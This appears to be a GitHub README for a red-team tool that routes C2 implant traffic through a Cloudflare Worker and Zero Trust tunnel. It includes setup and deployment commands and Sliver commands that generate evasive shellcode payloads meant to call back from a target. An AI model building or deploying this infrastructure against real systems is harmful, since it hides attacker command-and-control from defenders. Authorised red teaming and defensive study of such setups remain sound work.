
Just another C2 Redirector using CloudFlare.

Primary LanguageShellOtherNOASSERTION


Inspired by Alfie Champion article, I decided to publish my own version of a Cloudflare Redirector adding the Zero Trust aspect.

good old diagram

Note: The idea or "workflow" can be scaled and can also integrate more feature (Ex: Cloudflare WAF, Gateway workers concept, multiple redirectors for multiples C2 frameworks, integrate with KV store, R2 buckets, Queues, etc.). I may publish the more complete version in the future.

Things you will need

  • A running C2 framework. I am using Havoc for this demo.
  • Cloudflare "regular" account. (free)
    • Having a least one domain managed in your Cloudflare account.
  • Initiate your Cloudflare Zero Trust account through your Cloudflare "regular" account. (will ask for a credit card but free for the first 50 users). See screenshot 1.jpg in assets folder.
  • Install Cloudflare tunnel (cloudflared) in your C2 server.
  • wrangler cli. We will use wrangler cli to deploy and setup secrets but you can also do it use github actions for example.

In this example

  • C2 Listener hostname: https://listener.demo.com/
  • Worker endpoint: https://worker.demo.com/
  • Custom header value: Awesome-Header
  • see the file demo-profile.yaotl for the profile used in this demo.

Note: this a simple demo, you should not use the same domain between worker and ZT.

Secrets to setup

  • SERVICE_CF_ID (Cloudflare Service Auth ID to authenticate to Cloudflare Zero Trust) - see screenshot 3.jpg in assets folder.
  • SERVICE_CF_SECRET (Cloudflare Service Auth Secret to authenticate to Cloudflare Zero Trust) - see screenshot 3.jpg in assets folder.
  • CUSTOM_HEADER (custom header value use in workers)
  • WORKER_ENDPOINT (worker endpoint)
  • LISTEN_ENDPOINT (C2 listener hostname - hostname bind with cloudflared tunnel) - see screenshot 6.jpg in assets folder.

Overview Installation

  • Clone/fork this repo.
  • Modify the file demo-profile.yaotl to match your setup and use it on your C2 server.
  • Modify worker config file - ./workers/demo-redirector-c2/wrangler.toml.
  • [Optional] Modify worker code ./workers/demo-redirector-c2/src/index.js.
  • Setup secrets.
  • Deploy the worker.

Install and Deploy

# clone the repo
git clone ...
cd Cloudflare-Redirector
# modify demo-profile.yaotl to match your setup
# modify wrangler.toml to match your setup
cd workers/demo-redirector-c2
# when using "wrangler secret put <KEY>", you will be prompt to enter the secret value
wrangler secret put SERVICE_CF_ID
wrangler secret put SERVICE_CF_SECRET
wrangler secret put CUSTOM_HEADER
wrangler secret put WORKER_ENDPOINT
wrangler secret put LISTEN_ENDPOINT
# modify src/index.js [optional]
# deploy
wrangler deploy

After deployment

  • Start C2 server with your modified profile.
# ex:
./havoc server --profile profiles/demo-profile.yaotl -v
  • Generate new payload to execute on a target and execute.
  • Receive callback.
  • You can see the logs of your worker by selecting the worker in the Cloudflare dashboard and click on the "Logs" tab. After click on "Begin log streams". See screenshot 13.jpg in assets folder.

Not sure about the Zero Trust part ?

Follow the screenshots in assets folder, but in summary:

  1. Access zero trust section

  2. Create new service-auth token

  3. Create new tunnel (and setting up on your C2 server)

  4. Create application (self-hosted) rules to protect your listener (in the screenshots I'm using github authentication, but you can use the default "one-time pin". BTW, we only care about the Service-Auth policy since only our redirector need to visit listener url).


# modify ~/.sliver/configs/http-c2.json (add header)

profiles new --skip-symbols -b --arch amd64 profileCF
https -L -l 443
generate --http <worker.demo.com> --skip-symbols --disable-sgn --format shellcode --arch amd64


  • probably need a better README file
  • more stuff?
